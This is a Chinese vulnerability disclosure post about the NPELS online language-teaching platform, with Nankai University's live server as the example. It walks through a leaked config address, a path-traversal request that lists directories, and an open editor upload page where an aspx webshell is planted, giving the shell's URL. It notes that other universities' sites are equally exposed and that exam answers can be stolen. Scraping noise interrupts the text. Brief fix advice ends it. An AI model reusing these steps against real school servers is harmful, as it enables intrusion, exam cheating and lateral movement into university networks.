新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
- }6 m7 ], E  q
详细说明：
2 F) A5 @" S% _
* z: b) u8 s( B8 Z以南开大学的为例:
http://222.30.60.3/NPELS
8 d" x: K( n; c9 @' J3 Y, kNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
" x; k% y, [) t' b<setting name="Update_CommonSvr_CommonService" serializeAs="String">
$ J/ k' l8 d, G* k+ G3 b<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
4 q% F- }) V5 B( l) G/ h* E- t0 Y</setting>
及版本号
# D; S& {8 n: Y9 }: V4 O& C/ W1 _5 F9 F<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
: G& D/ I6 L3 h3 Ghttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
0 C8 b. M2 l5 `+ ~5 \http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
. C& b2 K2 N" `7 O: n+ v1 a进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
$ L& \; Z/ [7 b$ Y$ g8 `& n可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
# o, ^$ ?0 j+ q% J' n上传后继续列目录找到木马地址直接访问即可

: ^0 A2 m: ?3 M: l9 {: p9 cOOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
' u6 V1 e7 ~, t' x
8 Z! i. w! X; ]! t. _( @列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
* [8 u) H# T5 h: o  F/ z1 |, d8 E文件上传：
. P* V* a" v" {9 w. ~' Ehttp://222.30.60.3/npelsv/editor/editor.htm
" J! p- \" @$ M4 p) r' x
: Q$ H& Q* T% L; m0 y4 Q  z上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

  s2 f6 @2 Y$ g  ]  N6 w) V- `修复方案：
好像考试系统必须使用 CommonService.asmx
7 a/ Y& j6 T- {最好配置文件加密或者用别的方式不让它泄露出来
# S! H) \4 [' u4 j9 v并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
* P$ c: i, T* e7 F/ W4 d( W# ?" J